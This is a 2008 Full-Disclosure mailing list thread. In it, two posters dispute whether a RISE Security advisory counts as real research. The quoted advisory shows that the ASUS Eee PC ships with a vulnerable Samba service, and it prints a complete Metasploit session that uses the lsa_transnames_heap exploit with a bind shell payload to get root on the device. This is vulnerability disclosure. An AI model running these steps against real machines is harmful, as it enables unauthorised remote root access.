[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <e9d9d4020802081229h202d0810pe12e1ea4eb26dc1e@mail.gmail.com>
Date: Fri, 8 Feb 2008 14:29:38 -0600
From: reepex <reepex@...il.com>
To: keith@...uritynow.us, full-disclosure@...ts.grok.org.uk
Subject: Re: ASUS Eee PC rooted out of the box
yes and no where in here includes 'make some media hyped report & blog crap
for 5 minutes of fame'
On Feb 8, 2008 2:27 PM, <keith@...uritynow.us> wrote:
> Security research should go as follows, run some type of scanner to find
> known issues (low hanging fruit). Use your skill to manually try to find
> threats then manually create an exploit then report the issue after
> verified.
>
>
> -----Original Message-----
> From: reepex <reepex@...il.com>
> Sent: Friday, February 8, 2008 2:38pm
> To: RISE Security <advisories@...esecurity.org>,
> full-disclosure@...ts.grok.org.uk
> Subject: Re: [Full-disclosure] ASUS Eee PC rooted out of the box
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/So you ran metasploit
> and then made a blog post. Is this what 'security
> research' is considered now? And why did you write this is such a media
> hyped way? Trying to get some spotlight?
>
> On Feb 8, 2008 10:47 AM, RISE Security <advisories@...esecurity.org>
> wrote:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > We recently acquired an ASUS Eee PC (if you want to know more about it,
> > a lot of reviews are available on internet). The first thing we did when
> > we put our hands at the ASUS Eee PC was to test its security. The ASUS
> > Eee PC comes with a customized version of Xandros operating system
> > installed, and some other bundled software like Mozilla Firefox, Pidgin,
> > Skype and OpenOffice.org.
> >
> > Analysing the running processes of the ASUS Eee PC, the first thing that
> > caught our attention was the running smbd process (the sshd daemon was
> > started by us, and is not enabled by default).
> >
> >
> > eeepc-rise:/root> ps -e
> > PID TTY TIME CMD
> > 1 ? 00:00:00 fastinit
> > 2 ? 00:00:00 ksoftirqd/0
> > 3 ? 00:00:00 events/0
> > 4 ? 00:00:00 khelper
> > 5 ? 00:00:00 kthread
> > 25 ? 00:00:00 kblockd/0
> > 26 ? 00:00:00 kacpid
> > 128 ? 00:00:00 ata/0
> > 129 ? 00:00:00 ata_aux
> > 130 ? 00:00:00 kseriod
> > 148 ? 00:00:00 pdflush
> > 149 ? 00:00:00 pdflush
> > 150 ? 00:00:00 kswapd0
> > 151 ? 00:00:00 aio/0
> > 152 ? 00:00:00 unionfs_siod/0
> > 778 ? 00:00:00 scsi_eh_0
> > 779 ? 00:00:00 scsi_eh_1
> > 799 ? 00:00:00 kpsmoused
> > 819 ? 00:00:00 kjournald
> > 855 ? 00:00:00 fastinit
> > 857 ? 00:00:00 sh
> > 858 ? 00:00:00 su
> > 859 tty3 00:00:00 getty
> > 862 ? 00:00:00 startx
> > 880 ? 00:00:00 xinit
> > 881 tty2 00:00:06 Xorg
> > 890 ? 00:00:00 udevd
> > 952 ? 00:00:00 ksuspend_usbd
> > 953 ? 00:00:00 khubd
> > 1002 ? 00:00:00 acpid
> > 1027 ? 00:00:00 pciehpd_event
> > 1055 ? 00:00:00 ifplugd
> > 1101 ? 00:00:00 scsi_eh_2
> > 1102 ? 00:00:00 usb-storage
> > 1151 ? 00:00:00 icewm
> > 1185 ? 00:00:01 AsusLauncher
> > 1186 ? 00:00:00 icewmtray
> > 1188 ? 00:00:01 powermonitor
> > 1190 ? 00:00:00 minimixer
> > 1191 ? 00:00:00 networkmonitor
> > 1192 ? 00:00:00 wapmonitor
> > 1193 ? 00:00:00 x-session-manag
> > 1195 ? 00:00:00 x-session-manag
> > 1200 ? 00:00:00 x-session-manag
> > 1201 ? 00:00:00 dispwatch
> > 1217 ? 00:00:00 cupsd
> > 1224 ? 00:00:00 usbstorageapple
> > 1234 ? 00:00:00 kondemand/0
> > 1240 ? 00:00:00 portmap
> > 1248 ? 00:00:00 keyboardstatus
> > 1272 ? 00:00:00 memd
> > 1279 ? 00:00:00 scim-helper-man
> > 1280 ? 00:00:00 scim-panel-gtk
> > 1282 ? 00:00:00 scim-launcher
> > 1297 ? 00:00:00 netserv
> > 1331 ? 00:00:00 asusosd
> > 1476 ? 00:00:00 xandrosncs-agen
> > 1775 ? 00:00:00 dhclient3
> > 2002 ? 00:00:00 nmbd
> > 2004 ? 00:00:00 smbd
> > 2005 ? 00:00:00 smbd
> > 2322 ? 00:00:00 sshd
> > 2345 ? 00:00:00 sshd
> > 2356 pts/0 00:00:00 bash
> > 2362 pts/0 00:00:00 ps
> > eeepc-rise:/root>
> >
> >
> > Retrieving the the smbd version, we discovered that it runs a vulnerable
> > version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit
> > we published earlier last year.
> >
> >
> > eeepc-rise:/root> smbd --version
> > Version 3.0.24
> > eeepc-rise:/root>
> >
> >
> > With this information, we ran our exploit against the ASUS Eee PC using
> > the Debian/Ubuntu target (Xandros is based on Corel Linux, which is
> > Debian based).
> >
> >
> > msf > use linux/samba/lsa_transnames_heap
> > msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10
> > RHOST => 192.168.50.10
> > msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
> > PAYLOAD => linux/x86/shell_bind_tcp
> > msf exploit(lsa_transnames_heap) > show targets
> >
> > Exploit targets:
> >
> > Id Name
> > -- ----
> > 0 Linux vsyscall
> > 1 Linux Heap Brute Force (Debian/Ubuntu)
> > 2 Linux Heap Brute Force (Gentoo)
> > 3 Linux Heap Brute Force (Mandriva)
> > 4 Linux Heap Brute Force (RHEL/CentOS)
> > 5 Linux Heap Brute Force (SUSE)
> > 6 Linux Heap Brute Force (Slackware)
> > 7 DEBUG
> >
> >
> > msf exploit(lsa_transnames_heap) > set TARGET 1
> > TARGET => 1
> > msf exploit(lsa_transnames_heap) > exploit
> > [*] Started bind handler
> > [*] Creating nop sled....
> > ...
> > [*] Trying to exploit Samba with address 0x08415000...
> > [*] Connecting to the SMB service...
> > [*] Binding to
> > 12345778-1234-abcd-ef00-0123456789ab:0.0@...cn_np:192.168.50.10[\lsarpc]
> > ...
> > [*] Bound to
> > 12345778-1234-abcd-ef00-0123456789ab:0.0@...cn_np:192.168.50.10[\lsarpc]
> > ...
> > [*] Calling the vulnerable function...
> > [+] Server did not respond, this is expected
> > [*] Command shell session 1 opened (192.168.50.201:33694 ->
> > 192.168.50.10:4444)
> > msf exploit(lsa_transnames_heap) > sessions -i 1
> > [*] Starting interaction with 1...
> >
> > uname -a
> > Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
> > GNU/Linux
> > id
> > uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)
> >
> >
> > Easy to learn, Easy to work, Easy to root.
> >
> >
> > The original blog post and more information can be found in our
> > website at http://risesecurity.org/.
> >
> > Best regards,
> > RISE Security
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.2.6 (GNU/Linux)
> >
> > iD8DBQFHrIeHhFjK78TGSUERAvq7AJ9iz2sHD4/cQ0CdlCC1axNiVhwmJwCfddEd
> > 6tg6XRBCWHfPWFrSdVKu5oA=
> > =OFwe
> > -----END PGP SIGNATURE-----
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists